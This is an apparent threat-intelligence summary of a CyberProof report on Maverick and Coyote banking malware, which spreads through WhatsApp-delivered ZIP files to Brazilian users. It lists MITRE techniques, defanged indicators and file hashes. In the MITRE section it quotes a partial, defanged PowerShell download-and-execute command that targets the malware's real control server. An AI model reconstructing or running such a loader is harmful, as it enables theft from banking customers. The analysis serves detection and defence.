Threat Research

Maverick and Coyote Targeting Brazilian Banking Sector

Securonix
Maverick and Coyote Targeting Brazilian Banking Sector

CyberProof investigated a campaign spreading Maverick (aka Maverik) banking malware via WhatsApp downloads, finding multi-stage obfuscated PowerShell and .NET loaders that contact zapgrande[.]com and other C2s to deliver banking-focused capabilities targeting Brazilian users and banks. Analysis shows code, encryption (AES+GZIP), persistence, and victimology similarities with Coyote/Coyote-Maverick campaigns and public reports by Kaspersky, Sophos, and TrendMicro. #Maverick #Coyote #zapgrande

Keypoints

  • Initial infection vector observed: malicious ZIP delivered via web.whatsapp.com containing a .lnk shortcut that spawns obfuscated cmd/powershell to fetch payloads.
  • Observed first-stage sample: NEW-20251001_152441-PED_561BCF01.zip (SHA1: aa29bc5c…, SHA256: 949be423…) with encoded PowerShell that downloads from zapgrande[.]com.
  • Attack uses multi-stage, fileless patterns: obfuscated CMD → concatenated for-loop tokens → encoded PowerShell (-enc) → IEX DownloadString from C2 (zapgrande[.]com) and reflective .NET loaders in memory.
  • Maverick agent includes anti-analysis checks, persistence via HealthApp-GUID+.bat in startup, browser and banking-URL checks, AES+GZIP decryption of targeted bank URLs, and command-and-control capabilities.
  • Victimology and code overlap: primarily Brazilian users and banks; strong similarities with previously reported Coyote/Coyote-era samples and public research by Kaspersky, Sophos, and TrendMicro.
  • Key IOCs and C2s include zapgrande[.]com (109.176.30.141), sorvetenopote[.]com, and specific sample hashes; some C2 endpoints returned 404 during investigation, limiting full chain observation.
  • Provided a hunting KQL query to detect suspicious files downloaded via web.whatsapp.com and subsequent cmd→powershell spawn within a 1-hour window for SOC hunting.

MITRE Techniques

  • [T1204] User Execution – Malicious ZIP delivered via WhatsApp containing a .lnk that relies on user action to execute the shortcut and trigger the attack (“malicious Zip file downloaded from Whatsapp web” and “when the user is tricked to execute the lnk file (shortcut file), it deobfuscates code to construct and launch cmd or powershell”).
  • [T1059] Command and Scripting Interpreter – Use of cmd.exe and powershell.exe to build and execute encoded commands and download remote scripts (“cmd.exe … for %… do … powershell.exe -w hid -enc … IEX (New-Object Net.WebClient).DownloadString(‘hxxps[:]//zapgrande[.]com/…’)”).
  • [T1105] Ingress Tool Transfer – Downloader pattern where PowerShell downloads and executes remote payloads from zapgrande[.]com (“PowerShell downloads the remote script from zapgrande[.]com and executes it in memory (via IEX) which is a typical fileless downloader / loader pattern”).
  • [T1218] Signed Binary Proxy Execution (Scripting) – Use of legitimate interpreters (cmd.exe, powershell.exe) to execute malicious scripts and encoded commands (“Initial obfuscated CMD → spawn PowerShell → download-and-execute remote payload”).
  • [T1053] Scheduled Task/Startup Items – Persistence via batch file dropped in startup folder (HealthApp-.bat) contacting C2 on startup (“persistence is achieved through dropping batch file in startup folder … HealthApp- + GUID + .bat”).
  • [T1497] Virtualization/Sandbox Evasion – Anti-analysis checks in .NET loader to detect reverse-engineering tools and self-terminate if detected (“this .NET loader is programmed to check for anti-analysis techniques to check for reverse engineering tools and if any found, it would self-terminate”).
  • [T1106] Native API – Reflective loading of .NET assemblies in memory to avoid writing to disk (“code shown … looks to be a .NET loader that gets constructed and executed in memory through reflective loading”).
  • [T1555] Credentials from Web Browsers / T1476] Browser Bookmarking / T1056.001] Input Capture – Browser and banking-URL checks to monitor targeted banking applications and interact with browser processes (checks for browser PIDs and targeted Brazilian banking URLs to monitor/intercept sessions). (“Next it checks for browser checking PID … string match check of bank URLs performed by Maverick banking module”).
  • [T1041] Exfiltration Over C2 Channel – Agent supports commands and C2 communications for data/commands with attacker server (“Maverick agent … can perform command and control communication” and shows commands accepted by Maverick Agent).

Indicators of Compromise

  • [Domain] C2 and hosting – zapgrande[.]com (associated with 109.176.30.141) and sorvetenopote[.]com (associated with 77.111.101.169)
  • [IP] C2 IP – 109.176.30.141 used by zapgrande[.]com (observed outbound connection from PowerShell to 109.176.30.141)
  • [URL] Malicious download URL – hxxps[:]//zapgrande[.]com/api/itbi/BrDLwQ4tU70zZUeEHSSimym64kqXVG39 (PowerShell IEX DownloadString target)
  • [File Hashes] Sample artifacts – SHA1: aa29bc5cf8eaf5435a981025a73665b16abb294e, SHA256: 949be42310b64320421d5fd6c41f83809e8333825fb936f25530a125664221de
  • [File Hashes] Additional sample – SHA1: 835478d00945db56658a5f694f4ac9f5d49930db, SHA256: 77ea1ef68373c0dd70105dea8fc4ab41f71bbe16c72f3396ad51a64c281295ff
  • [FileName] Malicious archive/file name – NEW-20251001_152441-PED_561BCF01.zip (contains .lnk and encoded PowerShell)

Read more: https://www.cyberproof.com/blog/maverick-and-coyote-analyzing-the-link-between-two-evolving-brazilian-banking-trojans/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint